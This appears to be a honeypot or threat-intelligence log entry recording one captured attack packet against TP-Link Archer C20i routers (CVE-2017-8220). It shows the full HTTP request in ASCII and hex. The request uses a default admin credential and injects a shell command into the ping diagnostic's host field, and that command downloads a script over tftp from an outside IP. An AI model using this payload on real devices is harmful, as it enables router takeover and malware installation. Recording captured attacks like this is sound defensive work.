TPLINK Archer C20i CVE-2017-8220

tplink archer cve-2017-8220 2022-02-15 71 words One minute

Contents

Packet details

Protocol

TCP

Port

8080

Content MD5

fbb539fb-3648-2737-14c4-7ede080eeb93

Sample date time

2022-02-14 02:01:51.784

ASCII

uPOST /cgi?2 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain
Content-Length: 1000
Origin: http://192.168.1.1
DNT: 1
Connection: close
Referer: http://192.168.1.1/mainFrame.htm
Cookie: Authorization=Basic YWrtaW46YWRtaW4=

[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6&dataBlockSize=64&timeout=1&numberOfRepetitions=4&host=$(echo 127.0.0.1; tftp -g -r tshit.sh -l /var/tmp/shell 194.85.248.176; chmod 777 /var/tmp/tshit.sh)&X_TP_ConnName=ewan_ipoe_d&diagnosticsState=Requested

HEX

75504f5354202f6367693f322048545 | \x75504f5354202f6367693f3220485454502f312e310d0a486f73743a203139322e3136382e312e310d0a557365722d4167656e743a204d6f7a696c6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e5420352e31290d0a4163636570743a202a2f2a0d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e350d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a436f6e74656e742d4c656e6774683a20313030300d0a4f726967696e3a20687474703a2f2f3139322e3136382e312e310d0a444e543a20310d0a436f6e6e656374696f6e3a20636c6f73650d0a526566657265723a20687474703a2f2f3139322e3136382e312e312f6d61696e4672616d652e68746d0d0a436f6f6b69653a20417574686f72697a6174696f6e3d4261736963205957727461573436595752746157343d0d0a0d0a5b495050494e475f4449414723302c302c302c302c302c3023302c302c302c302c302c305d302c362664617461426c6f636b53697a653d36342674696d656f75743d31266e756d6265724f6652657065746974696f6e733d3426686f73743d24286563686f203132372e302e302e313b2074667470202d67202d722074736869742e7368202d6c202f7661722f746d702f7368656c6c203139342e38352e3234382e3137363b2063686d6f6420373737202f7661722f746d702f74736869742e73682926585f54505f436f6e6e4e616d653d6577616e5f69706f655f6426646961676e6f737469637353746174653d5265717565737465640d0a0d0a

External reference

CVE-2017-8220

Pierre Kim vulnerability discovery

Original packet

Bytes